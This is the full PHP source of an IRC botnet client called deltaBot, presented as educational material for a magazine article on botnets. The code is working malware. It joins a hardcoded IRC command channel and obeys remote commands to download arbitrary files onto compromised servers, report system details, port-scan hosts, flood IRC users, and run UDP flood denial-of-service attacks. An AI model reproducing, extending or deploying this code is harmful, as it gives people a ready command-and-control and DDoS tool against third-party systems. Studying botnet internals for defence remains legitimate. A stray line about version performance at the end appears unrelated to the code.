<?php
/*
#
# deltaBot v0.1.1
#
# A simple PHP IRC bot to illustrate the
# inner workings of a traditional botnet.
#
# By using this script you agree that the
# creator is by no means responsible for
# your actions and cannot be held liable
# for any damage you might inflict to
# third-party property. This file has been
# created for educational purposes only,
# during the writing of an article on
# botnets and information security for
# a magazine publication in Greece.
#
# Please leave feedback at: bruteforce.gr/deltabot
#
# This file is distributed under the terms of GPLv3.
#
*/
//We don't want the bot to stop
set_time_limit(0);
ini_set('display_errors', 'on');
class deltaBot {
//Do you run it locally or on a (zombie) server?
var $localhost = TRUE;
//Bot's version
var $version = '0.1.1';
//IRC server connection details
var $config = array(
'server' => 'unix.webchat.my',
'port' => 6667,
'channel' => '#unix',
'name' => 'spaceinvader',
'nick' => 'beware',
'pass' => '',
'maxrand' => 150,
);
//Variable to store our IRC connection
var $conn;
//Array to save the server/client messages using explode()
var $ex = array();
//Function that starts the bot and connects to the IRC server
function start()
{
$this->conn = fsockopen($this->config['server'], $this->config['port'], $e, $s, 30);
if(strlen($this->config['pass']) > 0)
{
$this->send("PASS config['pass']");
}
if(!$this->localhost) {
$this->send("USER ".$this->config['nick']." ".$_SERVER['SERVER_ADDR']." ".$_SERVER['SERVER_NAME']." :".$this->config['name']);
}
else {
$this->send("USER deltaBot 127.0.0.1 localhost :".$this->config['name']);
}
$this->send("NICK ".$this->config['nick'].mt_rand(0,$this->config['maxrand']));
$this->join($this->config['channel']);
$this->main();
}
//Bot's main function
function main()
{
while(!feof($this->conn))
{
//Take the data from the server and remove \r\n
$data = trim(fgets($this->conn, 256));
echo $data;
flush();
//Break messages into their components
$this->ex = explode(' ', $data);
//Play ping pong with the IRC server to stay connected
if($this->ex[0] == 'PING')
{
$this->send("PONG ".$this->ex[1]);
}
//The 4th word of each message corresponds to the given command
@$command = $this->ex[3];
//List of available commands, executable by the bot
switch($command)
{
//Join a channel, syntax: !join <#channel1> [#channel2]
case ':!join':
for($i=4; $i<(count($this->ex)); $i++)
{
$this->join($this->ex[$i]);
}
break;
//Part from a channel, syntax: !part <#channel1> [#channel2]
case ':!part':
for($i=4; $i<(count($this->ex)); $i++)
{
$this->part($this->ex[$i]);
}
break;
//Say something to a user/channel, syntax: !say <user/#channel> <message>
case ':!say':
$message = "";
for($i=5; $i<=(count($this->ex)); $i++)
{
$message .= $this->ex[$i]." ";
}
$this->send("PRIVMSG ".$this->ex[4]." :$message");
break;
//Display the bot's version, syntax: !version
case ':!version':
$this->send("PRIVMSG ".$this->config['channel']." :".$this->version);
break;
//Display each zombie's uptime, syntax: !uptime
case ':!uptime':
$uptime = system("uptime");
$this->send("PRIVMSG ".$this->config['channel']." :$uptime");
break;
//Display information about each zombie's web server, syntax: !server
case ':!server':
$software = $_SERVER['SERVER_SOFTWARE'];
$docroot = $_SERVER['DOCUMENT_ROOT'];
$this->send("PRIVMSG ".$this->config['channel']." :Server: $software, Document Root: $docroot");
break;
//Display system information about each zombie, syntax: !server
case ':!system':
$this->send("PRIVMSG ".$this->config['channel']." :".php_uname());
break;
//Download a file to each zombie, syntax: !download <URL> [path]
case ':!download':
if(!isset($this->ex[4]))
{
$this->send("PRIVMSG ".$this->config['channel']." :[--> Please give the file's URL!]");
break;
}
if(!isset($this->ex[5]))
{
$path = '/tmp/file.delta';
}
else
{
$path = $this->ex[5];
}
$this->download($this->ex[4], $path);
break;
//Flood a user/channel, syntax: !tsunami <user/#channel> [rounds]
case ':!tsunami':
$tsunami = "TSUNAMIIII!! hahah!!";
if(!isset($this->ex[4]))
{
$this->send("PRIVMSG ".$this->config['channel']." :[--> Please give the user/#channel to flood!]");
break;
}
if(isset($this->ex[5]))
{
$rounds = $this->ex[5];
}
else
{
$rounds = 20;
}
$this->send("PRIVMSG ".$this->config['channel']." :[\002Starting Tsunami flood @ ".$this->ex[4]." for $rounds rounds...\002]");
for($i=0; $i<$rounds; $i++)
{
$this->send("PRIVMSG ".$this->ex[4]." :$tsunami");
sleep(1);
}
$this->send("PRIVMSG ".$this->config['channel']." :[\002Finished Tsunami flood @ ".$this->ex[4]." for $rounds rounds!\002]");
break;
//Scan a host/IP for open ports, syntax: !portscan <host/IP> [comma seperated ports]
case ':!portscan':
if(!isset($this->ex[4]))
{
$this->send("PRIVMSG ".$this->config['channel']." :[--> Please give the host/IP to scan!]");
break;
}
$host = $this->ex[4];
if(isset($this->ex[5]))
{
$ports = $this->ex[5];
}
else
{
$ports = '21,22,23,25,53,80,110,443,445,8080';
}
$this->portscan($host, $ports);
break;
//Flood a host/IP using UDP packets, syntax: !udpflood <host/IP> [duration]
case ':!udpflood':
if(!isset($this->ex[4]))
{
$this->send("PRIVMSG ".$this->config['channel']." :[--> Please give the host/IP to flood!]");
break;
}
$host = $this->ex[4];
if(isset($this->ex[5]))
{
$duration = $this->ex[5];
}
else
{
$duration = 30; //δευτερόλεπτα
}
$this->udpflood($host, $duration);
break;
//Restart the bot, syntax: !restart
case ':!restart':
$this->restart();
exit;
//Shutdown the bot, syntax: !shutdown
case ':!shutdown':
$this->shutdown();
exit;
//Display help, syntax: !help
case ':!help':
$this->help();
break;
}
}
}
//Sends messages to the IRC server and displays them in the browser
function send($msg)
{
fputs($this->conn, $msg."\r\n");
echo '<strong>'.$msg.'</strong><br />';
}
//Joins a channel
function join($channel)
{
$this->send("JOIN $channel");
}
//Parts from a channel
function part($channel)
{
$this->send("PART $channel");
}
//Restarts the bot
function restart()
{
echo "<meta http-equiv=\"refresh\" content=\"5\">";
}
//Shutdowns the bot
function shutdown()
{
$this->send("QUIT ".$this->config['name']);
}
//Downloads a file to each zombie
function download($url, $path)
{
if(!$fp = fopen($path, "w"))
{
$this->send("PRIVMSG ".$this->config['channel']." :[--> You don't have write permissions to $path, please choose another path!]");
}
else
{
if(!$get = file($url))
{
$this->send("PRIVMSG ".$this->config['channel']." :[--> Unable to download file, please check the URL!]");
}
else
{
$this->send("PRIVMSG ".$this->config['channel']." :[\002Downloading file from $url to $path ...\002]");
for($i=0; $i<count($get); $i++)
{
fwrite($fp, $get[$i]);
}
$this->send("PRIVMSG ".$this->config['channel']." :[\002Finished download!\002]");
}
fclose($fp);
}
}
//Runs a port scan against a host/IP
function portscan($host, $ports)
{
$port = array();
$port = explode(',',$ports);
$this->send("PRIVMSG ".$this->config['channel']." :[\002Starting Port Scan @ ".$host." for ".(count($port))." ports...\002]");
for($i=0; $i<(count($port)); $i++)
{
$fp = @fsockopen($host, $port[$i], $e, $s, 10);
if($fp)
{
$this->send("PRIVMSG ".$this->config['channel']." :[Port ".$port[$i]." @ ".$host." is OPEN]");
fclose($fp);
}
else
{
$this->send("PRIVMSG ".$this->config['channel']." :[Port ".$port[$i]." @ ".$host." is CLOSED]");
}
}
$this->send("PRIVMSG ".$this->config['channel']." :[\002Finished Port Scan @ ".$host." for ".(count($port))." ports!\002]");
}
//Executes a UDP flood attack against a host/IP
function udpflood($host, $duration)
{
$packet = "";
for($i=0; $i<256; $i++)
{
$packet .= chr(mt_rand(0,255));
}
$this->send("PRIVMSG ".$this->config['channel']." :[\002Starting UDP flood attack @ $host for $duration seconds...\002]");
$max_time = time() + $duration;
while(time() < $max_time)
{
if($fp = fsockopen('udp://'.$host, mt_rand(0,8080), $e, $s, 5))
{
fwrite($fp, $packet);
fclose($fp);
}
}
$this->send("PRIVMSG ".$this->config['channel']." :[\002Finished UDP flood attack @ $host !\002]");
}
//Displays available bot commands
function help()
{
$this->send("PRIVMSG ".$this->config['channel']." :[\002List of available commands\002]");
$this->send("PRIVMSG ".$this->config['channel']." :[!say, !join, !part, !restart, !shutdown]");
$this->send("PRIVMSG ".$this->config['channel']." :[!download, !tsunami, !portscan !udpflood]");
$this->send("PRIVMSG ".$this->config['channel']." :[!uptime, !server, !system !version !help]");
}
}
//Create the bot and start it
$bot = new deltaBot;
$bot->start();
?>
Here you find the average performance (time & memory) of each version. A grayed out version indicates it didn't complete successfully (based on exit-code).